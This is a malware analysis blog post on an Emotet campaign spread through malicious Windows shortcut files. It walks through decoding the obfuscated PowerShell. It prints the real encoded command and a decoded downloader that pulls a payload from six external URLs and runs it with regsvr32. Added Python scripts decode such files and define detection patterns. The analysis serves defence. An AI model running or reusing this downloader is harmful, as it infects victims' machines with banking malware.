Learn about the new dissemination method of the Emotet malware

Learn about the new dissemination method of the Emotet malware and how to identify it

By Alexandre Siviero - Emotet is a trojan spread predominantly via fraudulent (malspam) email. The infection can arrive via a malicious script, a macro-enabled document or a malicious link. Emails carrying Emotet often imitate familiar promotions, designed so that they look like legitimate messages.

We obtained a sample of Emotet from the Triage website.

Figure 1: Site that contains sample

The focus of this report is not to explain in detail how Emotet works, but rather to show a way to identify and decode the most recent version of the payload that disseminates it. Throughout the report we will nevertheless give the names of the functions and modules involved, along with references the reader can consult to dig deeper into the subject.

Order of deobfuscation

The sample extracted from Triage is shown below.

Figure 2: Sample file

Unlike past campaigns spreading this malware family, this is not an Office document with malicious macros. The current campaign uses Windows shortcut files (.lnk extension), just like the example above.

To begin the analysis we inspect the properties of the shortcut in question:

Figure 3: Shortcut properties

In the Target field we notice something unusual for a file of this kind: a PowerShell command that decodes base64-encoded strings. Unfortunately the shortcut's target is too long to be displayed in full in the Properties window.

To get around this we use the HxD tool, a hex editor that shows the raw contents of any file. In the following image you can see part of the base64-encoded string.

Since a string in this form cannot be read directly, we used the CyberChef tool to decode it and obtained the following code:

Figure 4: Viewing the shortcut in hexadecimal

After translation, you can see some of the code contained in the file. Note the path \Windows\system32\cmd.exe, followed by a PowerShell invocation (obfuscated with cmd.exe caret escapes as p.^.o.^.w.^.e.^.r.^.s.^.h.^.e.^.l...e.^.x.^.e) and the base64 string.

c.m.d....e.x.e.............\.....\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.m.d....e.x. e.i./.v.:.o.n. ./.c.
.D.u.X.P.q.w.j.y.n.h.P.K.5.p.0.T.Y.c.a.C.f.4.G.k.A.t.B.W.l.J.m.P.l.w.q.d.5.q.s.n
.f.H.o.5.m.V.y.k.N.t.c.g.e.W.N.2.k.Q.L.m.a.c.K.q.V.A.R.F.E.g.F.V.|.|.g.o.t.o.&.p
.^.o.^.w.^.e.^.r.^.s.^.h.^.e.^.l.^.l...e.^.x.^.^.e. .-.c. .".&.{. .i.e.x.
.(..s.t.r.i.n.g.].[.S.y.s.t.e.m...T.e.x.t...E.n.c.o.d.i.n.g.]:.:.A.S.C.I.I...G
.e.t.S.t.r.i.n.g.(.[.S.y.s.t.e.m...C.o.n.v.e.r.t.]:.:.F.r.o.m.B.a.s.e.6.4.S.t.r
.i.n.g.(.'.J.F.B.y.b.2.d.y.Z.X.N.z.U.H.J.l.Z.m.V.y.Z.W.5.j.Z.T.0.i.U.2.l.s.Z.W.5
.0.b.H.l.D.b.2.5.0.a.W.5.1.Z.S.I.7.J.G.x.p.b.m.t.z.P.S.g.i.a.H.R.0.c.D.o.v.L.2.h
.v.M.j.g.w.M.z.E.5.M.D.A.x.L.m.h.v.Z.2.l.i.b.y.5.u.Z.X.Q.v.a.W.5.j.b.H.V.k.Z.S.9
.0.Z.1.F.3.e.G.l.j.N.F.F.3.d.U.0.v.I.i.w.i.a.H.R.0.c.D.o.v.L.3.d.3.d.y.5.n.Z.X.J
.v.b.n.R.v.Z.2.V.y.a.W.F.0.c.m.l.h.L.m.9.y.Z.y.9.0.b.X.A.v.Y.0.I.2.Y.2.d.U.V.m.Z
.5.e.V.o.z.Y.j.F.3.O.W.Q.v.I.i.w.i.a.H.R.0.c.D.o.v.L.2.N.s.d.W.J.t.Y.W.5.h.Z.2.V
.y.L.m.5.l.d.C.5.h.c.i.9.w.c.n.V.l.Y.m.E.v.V.k.5.x.c.3.g.z.N.j.h.G.S.H.F.L.S.y.8
.i.L.C.J.o.d.H.R.w.O.i.8.v.b.X.l.t.a.W.N.y.b.2.d.y.Z.W.V.u.L.m.1.p.Z.2.h.0.Y.2.9
.k.Z.S.5.j.b.2.0.v.R.m.9.4.L.U.M.v.b.m.h.N.W.X.d.r.R.l.h.C.L.y.I.s.I.m.h.0.d.H.A
.6.L.y.9.0.b.3.d.h.c.m.R.z.d.W.4.u.b.m.V.0.L.2.F.k.b.W.l.u.L.z.h.O.V.z.J.U.S.m.V
.Q.c.z.h.k.W.m.h.i.L.y.I.s.I.m.h.0.d.H.A.6.L.y.9.o.a.3.d.p.b.m.R.z.Y.W.N.h.Z.G.V
.t.e.S.5.z.e.W.5.v.b.G.9.n.e.S.5.t.Z.S.9.A.Z.W.F.E.a.X.I.v.c.U.g.y.R.U.h.1.d.l.l
.W.b.0.p.F.S.j.I.v.I.i.k.7.Z.m.9.y.Z.W.F.j.a.C.A.o.J.H.U.g.a.W.4.g.J.G.x.p.b.m.t
.z.K.S.B.7.d.H.J.5.I.H.t.J.V.1.I.g.J.H.U.g.L.U.9.1.d.E.Z.p.b.G.U.g.J.G.V.u.d.j.p
.U.R.U.1.Q.L.0.R.3.R.V.h.y.Y.2.d.O.W.G.o.u.U.X.l.V.O.1.J.l.Z.3.N.2.c.j.M.y.L.m.V
.4.Z.S.A.k.Z.W.5.2.O.l.R.F.T.V.A.v.R.H.d.F.W.H.J.j.Z.0.5.Y.a.i.5.R.e.V.U.7.Y.n.J
.l.Y.W.t.9.I.G.N.h.d.G.N.o.I.H.s.g.f.X.0.=.').)). .}.

When we tried to decode the base64, we noticed that the dots between the characters are how the hex editor renders a UTF-16LE string: each ASCII character is followed by a null byte, which HxD displays as ".". To make the text easier to read, we use a simple Python script to remove these unnecessary dots:

string = "[UNICODE STRING]"  # paste the dotted text column from the hex view here

unistring = ""

for i in range(len(string)):
    if i == 0:
        # the first character is always kept
        unistring += string[i]
        continue
    if string[i-1] == ".":
        # a dot with dots on both sides is a rendered null byte, not a real "."
        if i >= 2 and string[i-2] == "." and string[i] == ".":
            pass
        else:
            unistring += string[i]

print(unistring)

The script returns the following result:

"C:\Windows\system32\cmd.exe" /v:on /c DuXPqwjynhPK5p0TYcaCf4GkAtBWlJmPlwqd5qsnfHo5mVykNtcgeWN2kQLmacKqVARFEgFV|goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{ iex ([string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2hvMjgwMzE5MDAxLmhvZ2liby5uZXQvaW5jbHVkZS90Z1F3eGljNFF3dU0vIiwiaHR0cDovL3d3dy5nZXJvbnRvZ2VyaWF0cmlhLm9yZy90bXAvY0I2Y2dUVmZ5eVozYjF3OWQvIiwiaHR0cDovL2NsdWJtYW5hZ2VyLm5ldC5hci9wcnVlYmEvVk5xc3gzNjhGSHFLSy8iLCJodHRwOi8vbXltaWNyb2dyZWVuLm1pZ2h0Y29kZS5jb20vRm94LUMvbmhNWXdrRlhCLyIsImh0dHA6Ly90b3dhcmRzdW4ubmV0L2FkbWluLzhOVzJUSmVQczhkWmhiLyIsImh0dHA6Ly9oa3dpbmRzYWNhZGVteS5zeW5vbG9neS5tZS9AZWFEaXIvcUgyRUh1dllWb0pFSjIvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0R3RVhyY2dOWGouUXlVO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvRHdFWHJjZ05Yai5ReVU7YnJlYWt9IGNhdGNoIHsgfX0='))) }"

With the help of the CyberChef tool it is possible to decode the base64 string above. We can finally get a clear read on the attacker's intentions:

$ProgressPreference="SilentlyContinue";
$links=("http://ho280319001.hogibo.net/include/tgQwxic4QwuM/", "http://www.gerontogeriatria.org/tmp/cB6cgTVfyyZ3b1w9d/", "http://clubmanager.net.ar/prueba/VNqsx368FHqKK/", "http://mymicrogreen.mightcode.com/Fox-C/nhMYwkFXB/", "http://towardsun.net/admin/8NW2TJePs8dZhb/", "http://hkwindsacademy.synology.me/@eaDir/qH2EHuvYVoJEJ2/");
foreach ($u in $links) {
    try {
        IWR $u -OutFile $env:TEMP/DwEXrcgNXj.QyU; Regsvr32.exe $env:TEMP/DwEXrcgNXj.QyU; break
    }
    catch { }
}
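The dot-stripping script above works on the text column of the hex editor; the same result can be obtained directly from the file bytes, which avoids the hex view altogether. The following Python script is an added example, not code from the article or from any tool it mentions. It assumes a constructed byte blob (SAMPLE_LNK_BYTES) standing in for the real shortcut, with a harmless PowerShell payload and placeholder URLs, and reproduces the three steps of the analysis: reading the UTF-16LE text (what HxD shows as "c.m.d."), removing the cmd.exe caret escapes that split "powershell", and decoding the FromBase64String argument with ASCII, as the sample itself does.

```python
import base64
import re

# Constructed sample (not the article's file): a shortcut target line of the same
# shape as the one analysed above, but carrying a harmless PowerShell payload and
# placeholder URLs. The structure is cmd.exe /v:on, a junk token, "||goto&", a
# caret-split "powershell.exe" and an iex over FromBase64String(...).
INNER_SCRIPT = (
    '$links=("http://example.invalid/a/","http://example.invalid/b/");'
    'foreach ($u in $links) { Write-Output $u }'
)
B64 = base64.b64encode(INNER_SCRIPT.encode("ascii")).decode("ascii")
COMMAND = (
    r"\Windows\system32\cmd.exe /v:on /c XyZjunkToken||goto&"
    "p^o^w^e^r^s^h^e^l^l.e^x^e -c \"&{ iex ([string][System.Text.Encoding]::ASCII"
    ".GetString([System.Convert]::FromBase64String('" + B64 + "'))) }\""
)
# Wrap the UTF-16LE command in some non-text bytes, as the real file's header and
# link-target structures would.
SAMPLE_LNK_BYTES = (
    b"\x4c\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
    + COMMAND.encode("utf-16-le")
    + b"\x00\x00\xff\xff\xff\xff"
)

# A run of printable ASCII where every character is followed by a 0x00 high byte:
# exactly what the hex editor renders as "c.m.d....e.x.e".
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")


def utf16le_strings(data: bytes) -> list:
    """Return every printable UTF-16LE run of at least 8 characters in the file."""
    return [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(data)]


def strip_caret_escapes(cmdline: str) -> str:
    """Undo cmd.exe caret escaping: '^' is dropped and the next character is kept
    literally, so 'p^o^w^e^r^s^h^e^l^l' is executed as 'powershell'. Quoting rules
    are ignored, which is enough for the caret-split keyword seen in the sample."""
    out, i = [], 0
    while i < len(cmdline):
        if cmdline[i] == "^" and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])
            i += 2
        else:
            out.append(cmdline[i])
            i += 1
    return "".join(out)


B64_ARG = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)")


def decode_embedded_base64(cmdline: str) -> list:
    """Decode every FromBase64String('...') literal the way the sample does (ASCII)."""
    return [
        base64.b64decode(m.group(1)).decode("ascii", errors="replace")
        for m in B64_ARG.finditer(cmdline)
    ]


def recover_payloads(data: bytes) -> list:
    """Full pipeline: raw bytes -> UTF-16LE strings -> de-escaped command -> decoded payload."""
    payloads = []
    for s in utf16le_strings(data):
        payloads.extend(decode_embedded_base64(strip_caret_escapes(s)))
    return payloads


if __name__ == "__main__":
    for s in utf16le_strings(SAMPLE_LNK_BYTES):
        print("command :", strip_caret_escapes(s))
    for p in recover_payloads(SAMPLE_LNK_BYTES):
        print("payload :", p)
```

Run it against a real shortcut by replacing SAMPLE_LNK_BYTES with the file's contents (open(path, "rb").read()); the UTF-16LE regex finds the target string regardless of where the link structures place it, and the caret removal is what turns the broken-up "p^o^w^e^r^s^h^e^l^l" into a keyword a simple string match can catch.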

The code above holds six URLs in a variable named links. The loop then tries each address in turn: it downloads the content to the temporary folder ($env:TEMP/DwEXrcgNXj.QyU) and executes it with regsvr32.exe (a Windows utility that loads and runs DLLs). If the attempt succeeds, the loop ends (break). The idea behind this code is to provide alternative sources for the final payload: if one address is unavailable, the same procedure is tried for the next one in the list.
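Once the downloader loop has been decoded, the useful outputs for a defender are the URL list (to block and to search proxy logs for), the drop path (to hunt for on disk) and a description of the loop's behaviour that can be turned into a detection. The following Python is an added example, not the article's own code; it takes a decoded script of this shape, with constructed placeholder hosts and a placeholder file name instead of the real ones, and extracts those indicators.

```python
import re

# Constructed stand-in for the decoded downloader loop (not the article's decoded
# script): same structure as above, i.e. a URL array, a foreach/try loop, IWR to
# %TEMP%, Regsvr32 on the download and break on the first success, but with
# placeholder hosts and a placeholder file name.
DECODED_SCRIPT = (
    '$ProgressPreference="SilentlyContinue";'
    '$links=("http://host-a.example/x/Ab1/","http://host-b.example/y/Cd2/",'
    '"http://host-c.example/z/Ef3/");'
    'foreach ($u in $links) {try {IWR $u -OutFile $env:TEMP/PLACEHOLDER.QyU;'
    'Regsvr32.exe $env:TEMP/PLACEHOLDER.QyU;break} catch { }}'
)

URL_RE = re.compile(r"https?://[^\s\"'()]+")
OUTFILE_RE = re.compile(r"-OutFile\s+([^\s;]+)", re.IGNORECASE)


def extract_iocs(script: str) -> dict:
    """Pull the fallback URL list and the drop path out of a decoded downloader.
    These are what you would block at the proxy and hunt for on endpoints."""
    drop = OUTFILE_RE.search(script)
    return {"urls": URL_RE.findall(script), "drop_path": drop.group(1) if drop else None}


# Each indicator is one behaviour of the loop described in the text. None of them is
# conclusive alone; together they describe a multi-source downloader that hands the
# result to regsvr32.
INDICATORS = [
    ("silences_progress", r'\$ProgressPreference\s*=\s*"SilentlyContinue"'),
    ("url_array", r'\$\w+\s*=\s*\((?:\s*"https?://[^"]+"\s*,?)+\s*\)'),
    ("foreach_try_loop", r"foreach\s*\([^)]*\)\s*\{\s*try"),
    ("web_request_to_temp", r"\b(?:IWR|Invoke-WebRequest)\b[^;]*-OutFile\s+\$env:TEMP"),
    ("regsvr32_on_download", r"Regsvr32(?:\.exe)?\s+\$env:TEMP"),
    ("break_on_first_success", r";\s*break\s*\}"),
]


def downloader_indicators(script: str) -> list:
    """Names of the indicators present in a decoded script, in INDICATORS order."""
    return [name for name, rx in INDICATORS if re.search(rx, script, re.IGNORECASE)]


def is_multi_source_downloader(script: str, threshold: int = 4) -> bool:
    """Verdict: a script matching most of the indicators behaves like the loop above."""
    return len(downloader_indicators(script)) >= threshold


if __name__ == "__main__":
    print(extract_iocs(DECODED_SCRIPT))
    print(downloader_indicators(DECODED_SCRIPT))
    print(is_multi_source_downloader(DECODED_SCRIPT))
```

The threshold keeps the verdict from firing on a lone Invoke-WebRequest or a lone regsvr32 call, both of which are common in legitimate administration; it is the combination of a URL array, a try/break loop, a download into %TEMP% and regsvr32 loading that download which characterises this stage of the infection.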

Recommendations

We are all targets of Emotet. To date, Emotet has targeted individuals, businesses, and government entities around the world, stealing banking logins, financial data, and even bitcoin wallets.

One can highlight an Emotet attack on the city of Allentown, PA, which required the direct assistance of Microsoft's incident response team to perform the cleanup and entailed a repair cost of over $1 million for the city.

Now that Emotet is being used to download and spread other banking Trojans, the target list could be even wider. Early versions of Emotet were used to attack banking customers in Germany; later versions targeted organizations in Canada, the United Kingdom and the United States. The campaigns seen in 2022 have a worldwide focus; one example used the subject line "buona pasqua, happy easter" with a malicious XLS attachment that spreads and "installs" Emotet.

References

  1. https://pt.malwarebytes.com/emotet/
  2. https://www.checkpoint.com/press/2022/february-2022s-most-wanted-malware-emotet-remains-number-one-while-trickbot-slips-even-further-down-the-index/
  3. https://www.youtube.com/watch?v=-W4yZifokx0
  4. https://canaltech.com.br/seguranca/governo-do-japao-lanca-ferramenta-que-detecta-nova-versao-do-malware-emotet-215176/
